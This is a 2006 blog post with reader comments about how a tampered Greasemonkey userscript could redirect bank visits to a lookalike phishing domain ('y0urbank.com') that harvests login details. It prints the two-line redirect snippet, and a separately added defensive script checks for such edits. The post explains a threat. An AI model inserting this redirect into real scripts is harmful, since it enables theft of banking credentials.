Greasemonkey Phishing: Security


Greasemonkey is an extension to Firefox that allows you to write code to alter how a web page is viewed. For example, it can remove adverts from your favourite web page or replace rude words on web pages with milder alternatives. To alter pages in this way, code that tells the browser how to change the web page is loaded into Firefox.

Now suppose someone or some program has access to your computer. Can Greasemonkey be used for nefarious purposes? Once you can run programs on a machine many malicious opportunities arise, even just by altering text files like autoexec.bat or the hosts file.

If your enemy or his program goes to one of these Greasemonkey code files, he can alter the instructions in the file and you will not be informed. I am not sure this is a bug, as the alternative is those constant nag screens that say something like “something somewhere has changed, do you want to panic now?” which everyone ignores after a while.

So how can your enemy, by altering a Greasemonkey script, empty your bank account and go live in the Caribbean? The best way would be to alter the commands you send to your bank account and the responses your bank sends back to you. Because the malicious script is just altering an existing banking session, it does not need to know secret passwords and such, as you supply them.

I could go into details about how you would code up this behaviour, but I think a simple script illustrates it better. Say the attacker alters an existing script by adding the lines:

// @include yourbank.com

window.location.href = window.location.href.replace(/^http:\/\/yourbank\.com/, 'http://y0urbank.com');

When you try to go to your bank, this altered script brings you to a page that looks very similar to your bank's. You enter your registration number and digits 1, 2 and 3 of your 6-digit secret key, and answer with one of your pets' names. A failure message pops up and you are asked to re-enter your details, with digits 4, 5 and 6 this time and your date of birth. Different banks have different systems, but for many banks this would be enough information for the attacker to have full access to your account.
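Seen from the defender's side, the silent edit described above can be caught by comparing the installed script with a known-good copy and reporting any new `@include` scope or page-navigation statement. This is an added example, not code from the original post; `scopePatterns`, `auditUserscript` and both sample scripts are hypothetical names and constructed data.

```javascript
// Added example. Both sample scripts are constructed for illustration.
const baseline = [
  '// ==UserScript==',
  '// @name     Hide adverts (constructed sample)',
  '// @include  http://news.example/*',
  '// ==/UserScript==',
  "document.querySelectorAll('.advert').forEach(e => e.remove());",
].join('\n');

// The same file after the two additions described in the post.
const tampered = baseline.replace(
  '// ==/UserScript==',
  '// @include  yourbank.com\n// ==/UserScript=='
) + "\nwindow.location.href = window.location.href.replace(" +
    "/^http:\\/\\/yourbank\\.com/, 'http://y0urbank.com');";

// Collect the @include / @match patterns that decide where a script runs.
function scopePatterns(source) {
  const patterns = [];
  for (const line of source.split(/\r?\n/)) {
    const m = line.match(/^\s*\/\/\s*@(?:include|match)\s+(\S+)/);
    if (m) patterns.push(m[1]);
  }
  return patterns;
}

// Statements that navigate the page: location = ..., location.href = ...,
// location.replace(...), location.assign(...). Comparisons (==) are ignored.
const NAV_RE = /\blocation(?:\.href)?\s*=[^=]|\blocation\.(?:replace|assign)\s*\(/;

// Compare the installed copy with a known-good copy (hypothetical helper).
function auditUserscript(knownGood, installed) {
  const oldScope = new Set(scopePatterns(knownGood));
  const oldLines = new Set(knownGood.split(/\r?\n/).map(l => l.trim()));
  const newLines = installed.split(/\r?\n/).map(l => l.trim());
  return {
    modified: knownGood !== installed,
    addedScope: scopePatterns(installed).filter(p => !oldScope.has(p)),
    addedNavigation: newLines.filter(l => !oldLines.has(l) && NAV_RE.test(l)),
  };
}

console.log(auditUserscript(baseline, tampered));
```

A script whose scope suddenly covers a banking site, or that starts assigning to `location`, deserves a manual read before the browser is used for anything sensitive.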


Comments

Comment
>it's relatively easy for a script kiddie to develop one without much technical skill...so the risk factor is greater.
I would say the risk in a Greasemonkey script is much lower than a Firefox extension or an Internet Explorer BHO. Still, a risk is there, and telling people "oh you should look through the code" is expecting a lot of Greasemonkey's users. Thanks for the comment.

Mon Sep 25, 2006 9:47 am MST by cavedave

Comment
lots of hacks write such greasemonkey scripts and make them available for download...there are a ton of em on the interweb...they might serve some useful function and also contain some malware as described above...not so difficult to persuade someone to install them voluntarily... however it would be easy to trace the origin of such malware... point is that anything you install on your PC carries a risk. now the thing about greasemonkey scripts is that the barrier to entry is low...it's relatively easy for a script kiddie to develop one without much technical skill...so the risk factor is greater.

Mon Sep 25, 2006 9:26 am MST by Anonymous

Comment
>I assume this comment won't appear as you don't have any already visible,
No, it is because nobody reads this blog.
>First of all, there is no hosts.ini. It's just "host".
Sorry, my mistake. I corrected this.
>Second, if you in some extraordinary way could modify a greasemonkey script, that would mean that you have much more access to the machine, so greasemonkey is the last of your worries.
Agreed. I thought I made this clear in the sentence "Once you can run programs on a machine many malicious opportunities arise". Yes, you would have to have greasemonkey installed before greasemonkey could be used. That is not an insightful point you are making.
>See ya :)
Bye. Thanks for the comment.

Fri Sep 22, 2006 1:16 am MST by Anonymous

Comment
You don't know what you are talking about, do you? First of all, there is no hosts.ini. It's just "host". Second, if you in some extraordinary way could modify a greasemonkey script, that would mean that you have much more access to the machine, so greasemonkey is the last of your worries. You would have to install firefox, then the greasemonkey extension, then the greasemonkey script. And then they should have access to modify the script. If someone can do that, you are in trouble for other reasons. I call it FUD. There are some more wrong points in this post, which I won't address, but if you want, I can discuss it with you. I assume this comment won't appear as you don't have any already visible, but that's up to you. You have to research much more before spreading FUD. See ya :)

Thu Sep 21, 2006 2:46 pm MST by Masio
